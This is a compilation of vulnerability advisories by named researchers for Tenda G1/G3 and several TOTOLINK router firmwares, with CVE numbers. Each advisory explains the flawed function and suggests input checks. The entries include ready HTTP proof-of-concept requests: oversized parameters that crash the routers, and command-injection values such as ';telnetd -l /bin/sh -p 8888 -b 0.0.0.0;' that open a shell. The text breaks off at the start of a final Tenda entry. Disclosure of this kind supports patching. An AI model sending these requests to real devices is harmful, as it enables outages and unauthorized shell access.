Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function guestWifiRuleRefresh. This vulnerability allows attackers to cause a Denial of Service (DoS) via the qosGuestUpstream and qosGuestDownstream parameters.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `guestWifiRuleRefresh` function, `qosGuestUpstream、qosGuestDownstream` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `qosGuestUpstream、qosGuestDownstream` to crash the server.

There is a judgment logic in the function `refreshMibItem`, and one of the two inputs needs to be limited to a value of 0 to enter the vulnerability trigger point.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_4/images/1.png)

The function call chain:`formQOSSet`\->`guestWifiRuleRefresh`

In `formQOSSet` function, Only when the value of flag is 1, the `guestWifiRuleRefresh` function will be called.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_4/images/2.png)

In `setQosPolicy` function, Only when the value of `qosPolicy` is the string "user", will the flag value be 1.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_4/images/3.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `qosGuestDownstream` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /goform/setQos HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 653
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/qos/qosManage.html?0.5334447093236073
Cookie: \_:USERNAME:\_=; G3v3\_user=

qosGuestUpstream=0&qosGuestDownstream=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&qosPolicy=user

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45989: my_vuln/4.md at main · pjqwudi/my_vuln

Totolink devices A3100R v4.1.2cu.5050_B20200504, A830R v5.9c.4729_B20191112, and A720R v4.1.5cu.470_B20200911 were discovered to contain a stack overflow in the function setNoticeCfg. This vulnerability allows attackers to cause a Denial of Service (DoS) via the IpTo parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A3100R、A830R、A720R

Version:A3100R\_Firmware(V4.1.2cu.5050\_B20200504)、A830R\_Firmware(V5.9c.4729\_B20191112)、A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to crash the server.

**Stack overflow**

In `setNoticeCfg` function,`IpTo` is directly passed by the attacker, If this part of the data is too long, it will cause the stack call,so we can control the `IpTo` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_2/images/1.png)

**Supplement**

Initially, I discovered this vulnerability on A720R, which is located in `cstecgi.cgi`. Interestingly, during the process of observing other devices, I found that this function was encapsulated in `system.so`, such as A3100R; finally, I completed the verification on the A3100R device.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_2/images/2.png)

**PoC**

We set `IpTo` as aaaaaaaaaaaaa... , and the web server will crash,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1445
Origin: http://192.168.0.1
Connection: close

{"topicurl":"setting/setNoticeCfg","NoticeEnabled":"1","NoticeUrl":"www.baidu.com","BtnName":"abc123","WhiteListUrl1":"www.baidu.com","WhiteListUrl2":"","WhiteListUrl3":"","IpFrom":"3","IpTo":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","NoticeTimeoutVal":"120"}

It took a while before replying to the error message

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_2/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-44246: my_vuln/2.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a stack overflow in the function setL2tpServerCfg. This vulnerability allows attackers to cause a Denial of Service (DoS) via the eip, sip, server parameters.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:X5000R

Version:X5000R\_Firmware(V9.1.0u.6118\_B20201102)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recentl, allows remote attackers to crash the server.

**Stack Overflow**

In `cstecgi.cgi` binary:

In `setL2tpServerCfg` function, `eip、sip、server` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `eip、sip、server` to crash the server.

As you can see here, the input has not been checked.And then,call the function nvram\_set to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_9/images/1.png)

In `rc` binary:

Eventually, the initial input will be extracted and cause the stack overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_9/images/2.png)

**Supplement**

This vulnerability not only crashed my router, but also cannot be repaired, it can only be restored through rescue mode.

In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, make sure it is a valid ip address.

**PoC**

We set `eip` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 339
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/l2tp.html?time=1639908493613
Cookie: SESSION\_ID=2:1420070622:2

{"enable":"1","sip":"10.8.0.2","eip":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","server":"10.8.0.4","priDns":"8.8.8.8","secDns":"","mtu":1450,"mru":1450,"ipsecL2tpEnable":"0","ipsecPsk":"","topicurl":"setL2tpServerCfg"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_9/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45736: my_vuln/9.md at main · pjqwudi/my_vuln

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the Form_Login function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the Host parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A720R

Version:A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `lighttpd` binary:

In `Form_Login` function, `Host` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `Host` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_6/images/1.png)

Through the dynamic debugging of gdb, as you can see here, the parameter(a1+272) points to the content of the Host. It will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_6/images/2.png)

**Supplement**

**This type of buffer overflow appears in various places in the lighttpd file.(Host: ........)**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, you can limit the length of this field.

**PoC**

We set `Host` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa......** , then sending GET request such as:

GET /formLoginAuth.htm?action=login&flag=1 HTTP/1.1
Host: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSION\_ID=2:1591953155:2
Upgrade-Insecure-Requests: 1

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45737: my_vuln/6.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a command injection vulnerability in the function UploadFirmwareFile. This vulnerability allows attackers to execute arbitrary commands via the parameter FileName.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:X5000R

Version:X5000R\_Firmware(V9.1.0u.6118\_B20201102)

Type:Remote Command Execution

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `cstecgi.cgi` binary:

In `UploadFirmwareFile` function, `FileName` is directly passed by the attacker, so we can control the `FileName` to attack the OS.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/1.png)

**Supplement**

in the program. In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `FileName` as **;/usr/sbin/telnetd;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 86
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/upload.html?time=1639902909084
Cookie: SESSION\_ID=2:1420072624:2

{"topicurl":"UploadFirmwareFile","FileName":";/usr/sbin/telnetd;","ContentLength":"0"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/2.png)

We set `FileName` as **;telnetd -l /bin/sh -p 8888 -b 0.0.0.0;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 106
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/upload.html?time=1639902909084
Cookie: SESSION\_ID=2:1420072624:2

{"topicurl":"UploadFirmwareFile","FileName":";telnetd -l /bin/sh -p 8888 -b 0.0.0.0;","ContentLength":"0"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/3.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/4.png)

Get a shell!

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/5.png)

CVE-2021-45738: my_vuln/8.md at main · pjqwudi/my_vuln

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the Form_Login function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the flag parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A720R

Version:A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang,Zuoguang Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn,wangzuoguang16@mails.ucas.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to crash the server.

**Stack Overflow**

In `lighttpd` binary:

In `Form_Login` function, `flag` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `flag` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_5/images/1.png)

**Supplement**

in the program. In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, the length can be limited to only 2 and must be a number.

**PoC**

We set `flag` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa** , then sending GET request such as:

http://192.168.0.1/formLoginAuth.htm?action=login&flag=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

GET /formLoginAuth.htm?action=login&flag=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSION\_ID=2:1591953155:2
Upgrade-Insecure-Requests: 1

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45739: my_vuln/5.md at main · pjqwudi/my_vuln

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the setWiFiWpsStart function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the pin parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A720R

Version:A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow & Remote Command Execution

Author:Jiaqian Peng,Huizhao Wang,Zuoguang Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn,wangzuoguang16@mails.ucas.ac.cn

**Vulnerability description**

We found an vulnerability in TOTOLINK Technology router with firmware which was released recently.In `setWiFiWpsStart` function, `pin` is directly passed by the attacker, so we can control the `pin` to attack the OS or cause the stack overflow.

**Remote Command Execution**

In `cstecgi.cgi` binary:

In `setWiFiWpsStart` function, `pin` is directly passed by the attacker.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/1.png)

As you can see here, there is a **judgment logic** here. If the value of the input character is less than 0x3A, it will be copied to the array(v16). **We can construct the input to fill the /x00 between the two arrays**(v16 and v17), which will cause the sprintf function to copy the contents of the two arrays to the array(v14). Then, the array(v16) as a parameter of system function causes the remote command execution.

**Stack Overflow**

In `cstecgi.cgi` binary:

In `setWiFiWpsStart` function,`pin` is directly passed by the attacker.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/1.png)

As you can see here,The length of the input array(v17) is only 28 bytes, we can tamper with the content of the `pin` field, such as a very long string.After that, it will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/2.png)

**Supplement**

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/4.png)

in the program. In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, the length can be limited to only 8 and must be a number.

**PoC**

**Remote Command Execution**

We set `pin` as **11111111111111111111;/bin/telnetd;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/wps.html
Cookie: SESSION\_ID=2:1591951164:2

{"wifiIdx":"0","wscMode":"1","pin":"11111111111111111111;/bin/telnetd;","wscDisabled":"0","topicurl":"setWiFiWpsStart"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/5.png)

**Stack Overflow**

We set `pin` as **AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB** , it cause the stack overflow:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/wps.html
Cookie: SESSION\_ID=2:1591952948:2

{"wifiIdx":"0","wscMode":"1","pin":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB","wscDisabled":"0","topicurl":"setWiFiWpsStart"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/6.png)

**Result**

**Remote Command Execution**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/7.png)

**Stack Overflow**

The function return address to be overwritten(ra),This may allows attackers to achieve remote code execution.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/8.png)

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/9.png)

CVE-2021-45740: my_vuln/4.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a stack overflow in the function setIpv6Cfg. This vulnerability allows attackers to cause a Denial of Service (DoS) via the relay6to4 parameters.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:X5000R

Version:X5000R\_Firmware(V9.1.0u.6118\_B20201102)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `cstecgi.cgi` binary:

In `setIpv6Cfg` function, `relay6to4` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `relay6to4` to crash the server.

The input has not been checked.And then,call the function nvram\_set to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/1.png)

In `rc` binary:

Eventually, the initial input will be extracted and cause the stack overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/2.png)

As you can see here,The length of the input array(v24) is only 48 bytes and The length of the array(v25) is only 52, we can tamper with the content of the `relay6to4` field, such as a very long string.After that, it will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/3.png)

But!It is not such a simple operation that can crash the router.The sequence of function calls that caused the vulnerability to be triggered:

`full_restart_ipv6`\->`full_restart_wan`\->`start_wan`\->`wan6_up`\->`sub_4385B4(vuln func)`

As you can see,There is a conditional judgment in the first step:need to set the router mode to bridge.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/4.png)

**Therefore, the complete step to trigger the vulnerability is to first set the router mode to bridge by sending a data packet, and then send a malformed data packet(relay6to4 field).**

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set the router mode to bridge, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 329
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/opmode.html?time=1639968444503
Cookie: SESSION\_ID=2:1420070639:2

{"ssid":"TOTOLINK\_X5000R","key":"","channel":"0","band":"16","bw":"2","countryCode":"US","hssid":"0","wifiOff":"0","wpaMode":"1","ssid\_5g":"TOTOLINK\_X5000R\_5G","key\_5g":"","channel\_5g":"149","band\_5g":"17","bw\_5g":"3","countryCode\_5g":"US","hssid\_5g":"0","wifiOff\_5g":"0","wpaMode\_5g":"1","opmode":"br","topicurl":"setOpModeCfg"}

Then, we set `relay6to4` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 866
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/ipv6.html?time=1639967398362
Cookie: SESSION\_ID=2:1420070429:2

{"dns1":"2001:4860:4860:0:0:0:0:8888","dns2":"","dns3":"","lanRadvFake":"1","lanDhcp":"1","relay6to4":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","sitMtu":"1280","sitTtl":"64","service":"6to4","topicurl":"setIpv6Cfg"}

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45741: my_vuln/11.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetUSBShareInfo. This vulnerability allows attackers to execute arbitrary commands via the usbOrdinaryUserName parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

